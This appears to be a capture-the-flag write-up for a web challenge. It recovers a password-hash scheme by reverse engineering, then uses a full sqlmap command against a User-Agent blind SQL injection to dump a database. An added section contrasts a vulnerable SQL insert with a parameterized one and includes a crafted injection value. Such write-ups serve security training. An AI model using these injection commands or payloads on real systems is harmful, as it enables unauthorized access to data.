Forbiddenbits - Task 2

Task 2 Solution

The first hint was on the Support contact page, where we could see a message with the login "support01". But where was the password? We checked all the pages of the site and finally found a vulnerability in:

http://208.64.122.30/web002/?page=spaceships&more=

The Spaceships page showed a list of files; the interesting one was a Windows executable:

http://208.64.122.30/web002/hlds.exe

Some reverse engineering of this file gave us the hash generation algorithm:

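import hashlib
name = 'support01'
# Concatenate the decimal character code of every character in the login
s = ''
for x in name:
    s += '%d' % ord(x)
# The generated hash is the MD5 hex digest of that digit string
print(hashlib.md5(s.encode()).hexdigest())
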
The first flag could be seen in the userspace of our registered users. The second vulnerability (blind SQLi) was in the User-Agent header in the support userspace. So we used the sqlmap tool with the following command-line options:

./sqlmap.py -u "http://208.64.122.30/web002/?page=userspace" -p user-agent --cookie="PHPSESSID=li8hk6f8g29e4lickdhh2jhjs5" --technique=T --risk=5 --level=5 --dbms=mysql --tables --time-sec=2 -D chall --dump

Database: chall
Table: flag0x55558879 <-- second flag here
+--------------------------------------------------------+----+
| elkfjhOIEIUEIIUIUIIUOOIIU77 <--third flag here         | 14 |
+--------------------------------------------------------+----+
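
The User-Agent injection above comes down to a request header being pasted into SQL text. As an added example (not code from the challenge or from this write-up), the sketch below contrasts a string-built query with a parameterized one; the `visits` table, the function names and the use of sqlite3 in place of the challenge's MySQL backend are all assumptions.

```python
import sqlite3

def make_db():
    """In-memory stand-in for the site's database (schema is an assumption)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE visits (user TEXT, agent TEXT, role TEXT)")
    return conn

def log_visit_vulnerable(conn, user, user_agent):
    # The header value becomes part of the SQL text: a quote inside it ends
    # the string literal and whatever follows is parsed as SQL.
    sql = ("INSERT INTO visits (user, agent, role) "
           "VALUES ('%s', '%s', 'guest')" % (user, user_agent))
    conn.execute(sql)

def log_visit_safe(conn, user, user_agent):
    # Placeholders pass the header as data; it is never parsed as SQL.
    conn.execute(
        "INSERT INTO visits (user, agent, role) VALUES (?, ?, 'guest')",
        (user, user_agent),
    )

def run(logger, user_agent):
    """Log one request in a fresh DB; return stored rows, or None on SQL error."""
    conn = make_db()
    try:
        logger(conn, "support01", user_agent)
    except sqlite3.Error:
        return None
    return conn.execute("SELECT user, agent, role FROM visits").fetchall()

# Constructed header values for the demonstration.
CRAFTED_AGENT = "Mozilla/5.0', 'admin') --"   # rewrites the statement
APOSTROPHE_AGENT = "O'Brien/1.0"              # harmless, but contains a quote

if __name__ == "__main__":
    for logger in (log_visit_vulnerable, log_visit_safe):
        for agent in (CRAFTED_AGENT, APOSTROPHE_AGENT):
            print(logger.__name__, repr(agent), "->", run(logger, agent))
```

In the string-built version the header decides what the statement means, and even a harmless apostrophe produces an SQL error; the parameterized version stores both values verbatim.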


About this Entry

This page contains a single entry by Юрий Леонычев published on February 13, 2012 2:55 PM.
